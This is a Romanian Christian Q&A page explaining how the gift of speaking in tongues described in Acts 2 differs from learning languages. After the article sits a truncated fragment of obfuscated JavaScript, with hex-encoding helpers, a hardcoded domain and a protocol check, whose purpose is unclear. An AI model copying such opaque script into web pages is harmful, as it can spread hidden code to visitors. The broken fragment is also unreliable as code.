Care este diferența dintre darul vorbirii în limbi și capacitatea de a învăța o limbă?

Întrebare:

Cum să faci deosebire între darul vorbirii în limbi și capacitatea unor oameni de a învăța multe limbi. Este aceasta darul vorbirii în limbi sau nu?

Darul Duhului Sfânt de a vorbi în limbi este diferit de capacitatea de a învăța și a vorbi mai multe limbi străine. Când vorbim de darul vorbirii în limbi, trebuie să avem în vedere evenimentul când au fost date toate darurile spirituale. Ucenicii nu au avut aceste daruri înainte de ziua Cincizecimii și nici nu au depus un efort să le învețe, a fost un dar supranatural dat de Dumnezeu prin Duhul Sfânt, fără efort omenesc.

“În ziua Cincizecimii, erau toţi împreună în acelaş loc. Deodată a venit din cer un sunet ca vîjîitul unui vînt puternic, şi a umplut toată casa unde şedeau ei. Nişte limbi ca de foc au fost văzute împărţindu-se printre ei, şi s-au aşezat cîte una pe fiecare din ei. Şi toţi s-au umplut de Duh Sfînt, şi au început să vorbească în alte limbi, după cum le da Duhul să vorbească.” (Fapte 2:1-4)

Darul vorbirii în limbi este rezultatul și manifestarea Duhului Sfânt în ziua Cincizecimii. Toți cei ce au vorbit în cele 16 limbi menționate în Fapte 2 au vorbit mânați de Duhul Sfânt.

Cînd s-a auzit sunetul acela, mulţimea s-a adunat şi a rămas încremenită, pentrucă fiecare îi auzea vorbind în limba lui. Toţi se mirau, se minunau, şi ziceau unii către alţii: “Toţi aceştia cari vorbesc, nu sînt Galileeni? Cum dar îi auzim vorbind fiecăruia din noi în limba noastră, în care ne-am născut? Parţi, Mezi, Elamiţi, locuitori din Mesopotamia, Iudea, Capadocia, Pont, Asia, Frigia, Pamfilia, Egipt, părţile Libiei dinspre Cirena, oaspeţi din Roma, Iudei sau prozeliţi, Cretani şi Arabi, îi auzim vorbind în limbile noastre lucrurile minunate ale lui Dumnezeu. (Fapte 2:6-11)

Cuvântul “limbi” în limba greacă este “γλῶσσα glṓssa și înseamnă limbi diferite, diferite de limba maternă vorbită de apostoli, prin urmare o limbă ce nu au cunoscut-o și nu au învățat-o mai înainte. 

În toate cele trei cazuri din cartea Faptele Apostolilor (2, 10 și 19) în care s-a manifestat acest dar a fost o minune a lui Dumnezeu ce arăta prezența lui Dumnezeu în mijlocul celor prezenți și au fost de scurtă durată și toate au fost pentru a arăta prezența și lucrarea lui Dumnezeu.

Pentru o înțelegere mai adâncă a acestui subiect, vă recomand următorul articol și cursul de studiu biblic inductiv:

  • Vorbirea în limbi menționată în Faptele Apostolilor este aceeași cu cea din Epistola 1 către Corinteni?
  • Darurile spirituale.

 

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "moldovacrestina.md"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e